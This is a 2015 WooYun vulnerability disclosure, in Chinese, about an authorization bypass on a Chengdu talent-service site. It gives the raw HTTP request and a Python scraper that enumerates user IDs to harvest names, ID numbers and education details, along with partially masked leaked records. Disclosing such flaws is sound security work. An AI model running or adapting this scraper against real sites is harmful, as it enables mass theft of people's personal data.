当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103899

漏洞标题:某人才服务平台越权导致大量个人信息泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-03-27 17:09

修复时间:2015-05-16 13:32

公开时间:2015-05-16 13:32

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-27: 细节已通知厂商并且等待厂商处理中
2015-04-01: 厂商已经确认,细节仅向厂商公开
2015-04-11: 细节向核心白帽子及相关领域专家公开
2015-04-21: 细节向普通白帽子公开
2015-05-01: 细节向实习白帽子公开
2015-05-16: 细节向公众公开

简要描述:

越权操作,导致大量用户隐私信息泄露

详细说明:

成都市人才服务平台,网址

http://i.rc114.com


如图,注册一个账号,以合法用户登录编辑个人信息。

1.png


会发送如下HTTP POST请求

POST /RealNameRegistration.aspx/getRealNameInfoByPno HTTP/1.1
Host: i.rc114.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://i.rc114.com/RealNameRegistration.aspx
Content-Length: 15
Cookie: Hm_lvt_57c48c2407b9363122624c39f3e251df=1415000092,1415061514,1415150093; Hm_lvt_fe01b1430376b312631b121e55200580=1427341437; ASP.NET_SessionId=xf5zmts1my1232weeitx03lv; Hm_lpvt_fe01b1430376b312631b121e55200580=1427341473
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{ pno:'595000'}


但上述pno可从1开始遍历,返回其他人员的注册信息,包括姓名、身份证号、毕业学校等,约影响60w条数据。
慢速获取数据的POC如下:

import httplib,time,codecs

def crawl(strnum, file, id):
paramTemplate = '''
{ pno:%s}'''
body = paramTemplate%strnum
headers = {
'Host':'i.rc114.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0',
'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate','Content-Type': 'application/json; charset=utf-8',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'http://i.rc114.com/RealNameRegistration.aspx',
'Content-Length': str(len(body)),
'Cookie': 'Hm_lvt_57c48c2407b9363122624c39f3e251df=1415000092,1415061514; Hm_lvt_fe01b1430376b312631b121e55200580=1415002633,1415003018,1415061505; ASP.NET_SessionId=53k2lzvxa41kle5rxw2qxz1d; Hm_lpvt_fe01b1430376b312631b121e55200580=1415083567; Hm_lpvt_57c48c2407b9363122624c39f3e251df=1415061514',
'Connection': 'keep-alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }
try:
conn = httplib.HTTPConnection('i.rc114.com',80)
conn.request('POST','/RealNameRegistration.aspx/getRealNameInfoByPno',body,headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read().decode('UTF-8')
file.write('id=%s:'%id)
file.write(data)
file.write('\n------------------------------------------------\n')
conn.close()
except HTTPException, e:
print e.code
return 1
finally:
return 0
def main( ):

f = codecs.open('db.txt', 'a', 'utf_16')
for i in range(600000,600010):
strnum = str(i+1)
while( crawl(strnum, f, str(i))):
pass
time.sleep(10)
f.close()

if __name__=='__main__':
main()

漏洞证明:

利用上述POC可获得约60w条用户注册信息,包括姓名、身份证号、毕业学校、专业等。
(下面区域一行太长,选中点右键查看源代码可看到完整信息)

mask 区域
*****ode*****
*****ot;ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027四川电力职业技术学院\u0027,\"gradtime\":\u00272006-07-01\u0027,\"major\":\u0027电力*****
*****------------*****
*****tpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027电子科技大学\u0027,\"gradtime\":\u00272004-06-30\u0027,\"major\":\u0027电子信息工程(电^*****
*****------------*****
*****\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南交通大学\u0027,\"gradtime\":\u00272009-01-05\u0027,\"major\":\u0027电气工^*****
*****------------*****
*****\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027硕士\u0027,\"gradschool\":\u0027四川大学\u0027,\"gradtime\":\u00272010-07-01\u0027,\"major\":\u*****
*****------------*****
*****27,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南交大\u0027,\"gradtime\":\u00272005-07-12\u0027,\"major\":\u0027电气工^*****
*****------------*****
*****027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027中专\u0027,\"gradschool\":\u0027成都铁路运输技工学校\u0027,\"gradtime\":\u00271997-07-01\u0027,\"major\"*****
*****------------*****
*****:\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027四川师范大学\u0027,\"gradtime\":\u00272005-06-30\u0027,\"major\"*****
*****------------*****
*****ot;ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027太原电力高等专科学校\u0027,\"gradtime\":\u00272000-07-01\u0027,\"major\":\u0027发^*****
*****------------*****
*****027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南交通大学\u0027,\"gradtime\":\u00272005-07-01\u0027,\"major\":\u002*****
*****------------*****
*****ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027上海应用技术学院\u0027,\"gradtime\":\u00272001-06-29\u0027,\"major\":\u0027食品化工^*****
*****------------*****
*****u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027硕士\u0027,\"gradschool\":\u0027四川大学\u0027,\"gradtime\":\u00272006-06-30\u0027,\"major\":\u002*****
*****------------*****
*****7\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南民族大学\u0027,\"gradtime\":\u00272005-06-01\u0027,\"major\":\u002*****
*****------------*****
*****0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027四川大学\u0027,\"gradtime\":\u00272003-06-30\u0027,\"major\":\u0027广播^*****
*****------------*****
*****27,\"ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027成都电子科技大学\u0027,\"gradtime\":\u00272002-06-30\u0027,\"major\":\u0027^*****
*****------------*****
*****0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027电子科技大学\u0027,\"gradtime\":\u00272002-08-01\u0027,\"major\":\u0027^*****
*****------------*****
*****ytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027硕士\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027*****
*****cpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\*****
*****------------*****
*****7,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\*****
*****------------*****
*****cpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\*****
*****------------*****
*****cpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\*****
*****------------*****
*****":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027中等专科\u0027,\"gradschool\":\u0027成都卫校\u0027,\"gradtime\":\u00272015-07-01\u0027,\"major\&quo*****
*****------------*****
*****ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\*****
*****------------*****
*****,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\*****
*****------------*****
*****ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\*****
*****------------*****
*****7,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\*****
*****------------*****
*****27,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\*****
*****------------*****
**********
*****cod*****

修复方案:

增加权限认证

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-04-01 13:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置.

最新状态:

暂无